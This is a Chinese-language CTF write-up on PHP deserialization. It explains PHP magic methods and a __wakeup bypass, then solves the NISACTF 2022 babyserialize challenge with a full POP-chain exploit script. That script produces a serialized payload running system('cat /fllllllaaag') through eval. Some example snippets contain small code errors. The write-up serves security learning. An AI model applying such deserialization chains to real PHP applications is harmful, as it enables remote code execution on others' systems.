php中，序列化和反序列化是相对的两个过程，序列化是把变量或对象转化成字符串的过程

反序列化是把字符串转换为变量过着对象的过程

在php的反序列化中，存在类，当类被以特定的方式就会触发魔术方法，在实行序列化的过程中，合理的调用魔术方法，是能成功的关键；尤其在pop链的构造中，需要在多个类中调用不同的魔术方法，来构成完整正确的链。对于pop链的构造，优先找到链尾，明确了在链尾需要调用到什么魔术方法来实现，再往上反推

记录一下目前为止，我遇到过的魔术方法

_construct(),构造函数，当在实例化一个对象时会被调用，也就是new一个对象时会调用

<?php
class G{
 
    public $user;
 
    public function __construct()
    {
        $this->user = $user;
        echo "__construct test";
    }
 
}
$g = new G;
echo serialize($g)

_destruct()，折构函数,会在对象的所有引用被删除或者当对象被显式销毁时自动执行，在new完一个对象后，如果有赋值的指像，那么就会丢弃并触发__destruct,在new和unserialize时会触发

<?php
class G{
 
    public $user;
 
    public function __destruct()
    {
        $this->user = $user;
        echo "__destruct test";
    }
 
}
$g = new G;
$a=serialize($g);
echo unserialize($a);
?>

_invoke()函数，用调用函数的方法调用一个对象

<?php
class G{
 
    public $user;
 
    public function __invoke()
    {
        eval($this->$user);
    }
 
}
$g = new G;
?>

_toString(),对象被当做字符串调用时触发，或者echo时触发

<?php
class G{
 
    public $user;
 
    public function __invoke()
    {
        system($this->$user);
    }
 
}
$g = new G;
echo $g;
?>

_wakeup()，执行unserialize时触发，这个函数又是需要绕过，绕过的方法就是让我们构造的序列化的字符串中的对象数量大于真实存在的数量就可以了，因为反序列化的过程中，php会忽略掉多出来的数据

看看题吧

[SWPUCTF 2021 新生赛]no_wakeup

http://t.csdnimg.cn/uG79E

[NISACTF 2022]babyserialize

先看源代码，有4个类，需要构造pop链了

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

构建pop链要先找到链尾，链尾有什么特征呢（一般链尾都是具有eval，include这些高危函数，能够让我们利用来获取flag的地方）

public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }

eval函数，很明显就是能够利用获取flag的位置，作为链尾，然后开始反推，要先触发invoke对象，才会执行eval函数，invoke函数在将对象以函数的形式调用时触发，到所有类中寻找调用函数的

public function __toString(){
        $bb = $this->su;
        return $bb();

下一步，触发tostring函数，寻找调用字符串的，找到strtolower函数，该函数是将字符串转换成小写

public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }

__set(),在对不存在或者不可访问的成员变量进行赋值就会自动调用，去寻找类中没被定义的变量，fun是没有被定义的，所以不存在

public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

_call调用一个不可访问的方式触发，调用了nisa，但是这个类中不存在，因此无法访问

public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }

现在的wakeup又回到了NISA，一条pop链就完成了

<?php
class NISA{
    public $fun="123";
    public $txw4ever="System('cat /fllllllaaag ');";
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="abc";
    private $fun='sixsixsix';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}
$n=new NISA;
$i=new Ilovetxw;
$i->su=$n;
$f=new four;
$f->a=$i;
$i=new Ilovetxw;
$i->huang=$f;
$t=new TianXiWei;
$t->ext=$i;
echo urlencode(serialize($t));
?>

 疑惑：

在写完pop链以后，再细细想一想发现在_call和_set 函数在触发的条件有点疑惑（不知道大家有没有疑惑），去查了资料，请教了师兄，发现了两种方法的区别，先来看两种方法的代码

__call()方法是一个魔术方法，用于在对象中调用不存在或不可见的方法时被自动调用。在反序列化过程中，如果对象中定义了__call()方法，PHP会在调用不存在的方法时执行该方法。_call()

class MyClass {
    public function __call($method, $args) {
        echo "Calling method $method with arguments: " . implode(', ', $args);
    }
}

// 序列化一个对象
$serializedData = 'O:7:"MyClass":0:{}';

// 反序列化对象
$obj = unserialize($serializedData);

// 调用不存在的方法
$obj->someMethod(1, 2, 3);

__set()方法是一个魔术方法，用于在给对象的不可访问属性赋值时被自动调用。在反序列化过程中，如果对象中定义了__set()方法，PHP会在设置对象的不可访问属性时执行该方法。

class MyClass {
    public function __set($name, $value) {
        $this->$name = $value;
        echo "Setting property $name to $value";
    }
}

// 序列化一个对象
$serializedData = 'O:7:"MyClass":0:{}';

// 反序列化对象
$obj = unserialize($serializedData);

// 设置对象属性
$obj->someProperty = 'someValue';

两种方法都访问了不存在的“东西”，但是注意看在访问时赋值的对象，set是设置的是不可访问的属性，因此是用=和‘’来赋值；call是设置不可访问的方法，是利用数组来传递的方法的值，因此在pop链中同时出现set和call是要仔细辨别触发的条件